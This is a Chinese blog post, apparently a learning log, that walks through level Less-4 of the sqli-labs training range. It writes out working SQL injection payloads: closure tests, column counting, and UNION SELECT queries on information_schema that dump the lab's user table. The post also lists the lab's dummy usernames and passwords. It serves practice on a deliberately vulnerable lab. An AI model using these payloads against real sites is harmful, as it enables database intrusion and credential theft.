sqli-labs-master/ Less-4

于 2022-07-05 11:47:13 发布
阅读量390 收藏
点赞数
分类专栏: sqli-labs-master 文章标签: 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45052704/article/details/125610446
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

sqli-labs-master/ Less-4

前言

SQL学习记录

步骤

1.寻找注入点

2.判断闭合方式

加字母不报错,尝试输入’、“,输入’时无报错也无输出,输入"时报错信息如下:
'”-1"“) LIMIT 0,1’
去除外层单引号与输入内容,确定为”)闭合
在这里插入图片描述

?id=1") --+在这里插入图片描述

3.判断漏洞是否存在

?id=1") and 0–+
?id=1") and 1–+

and 1 正常显示and 0无显示,说明人为可控,漏洞存在
在这里插入图片描述
在这里插入图片描述

4.判断列数

用二分法与order by最终确定列数为3
在这里插入图片描述

5.判断回显位

?id=-1") union select 1,2,3–+
确定2,3为回显位
在这里插入图片描述

6.查询数据库名,表名,列名,元素

?id=-1") union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database())–+

查询数据库名:security
表名:emails,referers,uagents,users

在这里插入图片描述

?id=-1") union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’)–+

查列名:id,username,password
在这里插入图片描述

?id=-1") union select 1,(select group_concat(username) from users),(select group_concat(password) from users)–+

查username:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
查password:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4
在这里插入图片描述

唐醋咸鱼
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-lab刷题Less-4
MichealCurry1的博客
10-07 103
输入?id=1\发现其报错 由此猜测原sql语句为("$id") 输入?id=1") --+发现其不报错 证实了猜测,由此可以爆出数据库 具体操作见sqli-lab刷题Less-1,只需要将其中的?id=1'替换为?id=1")即可
sqli-labs-less-4图文详解,适合小白
yzcn
10-23 1338
Less-4 less1-3以发布,1-4题相关知识点在https://blog.csdn.net/qq_46432288/article/details/109226871中,点击查看吧!!! less-4与1-3方法基本一致,只是最开始的判断注入点有一点差别。 判断注入: http://127.0.0.1/sqli-labs-master/Less-4/?id=1 显示正常 http://127.0.0.1/sqli-labs-master/Less-4/?id=1’ 显示正常 http://12
Sqli-labs-master的1-4关冲关浅分析与拓展
bosskim的博客
06-11 533
浅分析sqli-labs-master的1-4关
sqli-labs Less 3-4解题思路
qq_35266419的博客
05-09 204
因为Less1-4大同小异,所以这里主要介绍Less-3,谢谢理解 Less-3 GET-Error based-single quotes with twist - string ①寻找注入点,分析出错原因 ②构造URL使之正常回显,此处为字符型注入 ③现在开始爆字段(顺序一般都是爆字段=>数据库=>爆表=>获得列名=>获得表中的username和password)...
sqli-labs通关攻略教程四(less 18~less-22)
m0_55854679的博客
07-11 263
sqli-labs通关攻略教程二(less 1~less-17) less 18 与第一关相同的步骤。首先在phpstudy中打开网站根目录,在第一关的index.php的文件中加入两行代码echo $sql; echo "<br>";第一句意思是将我们构造的sql语句进行输出,第二句意思为换行符,方便我们浏览。 输入正确的用户名和密码,发现页面回显了IP地址,构造的sql语句和浏览器的使用版本一些信息.。若密码输入错误,则无浏览器版本的回显信息。 **注意:**如果你的密码输入admin
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
phpstudy+靶场sqli-labs-master下载
sql注入系列之Sqli-labs(less-4)
BetsyMyGirl的博客
12-06 825
看完不会来打我
sqli-labs-master【Less-3/4】
weixin_44352521的博客
12-10 303
今天我们来学习sqli-labs的第三关! 1. 判断注入的数据类型 http://192.168.228.129/sqli-labs-master/Less-3/?id=1 http://192.168.228.129/sqli-labs-master/Less-3/?id=1 and 1=2 根据url中输入的内容,输入id=1跟id=1 and 1=2结果一样没有变化,所以我们判断是...
Sqli labs系列-less-4 这关好坑!!!
weixin_30855099的博客
08-28 70
这章,可能我总结开会比较长,图比较多,因为,我在做了一半,走进了一个死胡同,脑子,一下子没想开到底为啥。。。。 然后我自己想了好长时间也没想开,我也不想直接就去看源码,所以就先去百度了一下,结果一下子,我又跳进另一个坑了。。。。正如这章的顶图,MySQL语句,我看人家正好用这个分析,为什么大家在构造语句的时候要用这个SQL语句,我自己想了想,我好像没总结这么细,所以就趁着这章,把那个SQL语句的...
sqli-labs Less-1~Less-4做题记录
Goodric的博客
12-13 209
以下使用sqli-labs靶场进行练习sql注入 关于靶场的搭建,可参考:https://blog.csdn.net/Goodric/article/details/110098085 Less-1 用 ?id=xxx 进行 get 请求,来判断是否存在 sql 注入, 可以在url中看到传递的参数。 输入 ?id=1 and 1 = 2 --+ ,回显正常,此处不是数字型注入。 再输入?id=1’ (后面加一个), 回显不正常,可能存在sql注入漏洞, 大概率就是字符注入了。 get参数 1 被
SQLI—labs-master(前四关之闭合符详解)
Hala
03-30 1783
思路: 利用漏洞极多的靶场来模拟SQL注入 环境: Metasploitable2 步骤: 1.查看虚拟主机的IP 2.开启服务,可见如下的TCP端口就处于开启状态 root@metasploitable:~# nmap -p0-65535 192.168.211.132 Starting Nmap 4.53 ( http://insecure.org ) at 2020...
sqli-labs Lesson-4详细过程
Brad_的博客
10-17 486
OneNote粘贴为图片,最好自己动手试一下。
sqli-labs less4
Monster1m的博客
01-01 135
一、输入id,显示正常 http://127.0.0.1/sqli-labs-master/Less-4/?id=1 二、判断是闭合方式(因为题目说明了字符注入,则省略判断数字型步骤) 1.输入单引号,页面正常 http://127.0.0.1/sqli-labs-master/Less-4/?id=1' 2.输入双引号,页面报错 http://127.0.0.1/sqli-labs-master/Less-4/?id=1" 3.由于双引号报错,则在双引号后添加注释符,页面报错 http://127
sqli-labs—————Less-4
Fly_鹏程万里
05-08 635
Less4根据要求传入参数id,数据类型numeric添加单引号、and 1=1  、and 1=2进行测试感觉是不是非常奇怪,为什么都是正确显示页面呢?我们不妨再试试双引号注入代码之后,我们得到了下面这个错误You have an error in your SQL syntax; check the manual that corresponds to your MySQL server ve...
sqli-labs-master less-1---less-4
qq_44813849的博客
07-20 163
less-1 根据提示尝试输入一个id=1,能够看到数据 在1后面加一个 ’ ,开始报错 然后查看一下源代码和错误提示我们了解到,提交的sql中的 1’ 构造形成了’1’’ LIMIT 0,1 我们应该把后面的注释掉 所以在后面加一个 %23或–+ 接着使用order by 来对数据进行排序,我们可以从1开始测试或者使用均分法先从一个大的数据测,然后再分半。这一题测试过后只有三列,四就开...
Sqli-Labs之less-3
ISNS的博客
02-05 1082
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 目前看来,这几关都是基于less-1的思路,所以详细过程参见: Sqli-Labs之less-1 less-3的主要的变化还是在于注入点的判断: 后续的操作就一样了: ...
sqli-labs-master/Less-17
07-28
Less-17 是一个 SQL 注入实验,它位于 sqli-labs-master 实验室的目录中。在这个实验中,你可以学习和实践 SQL 注入攻击的技术。 SQL 注入是一种常见的网络安全漏洞,它允许攻击者通过在应用程序的输入字段中注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值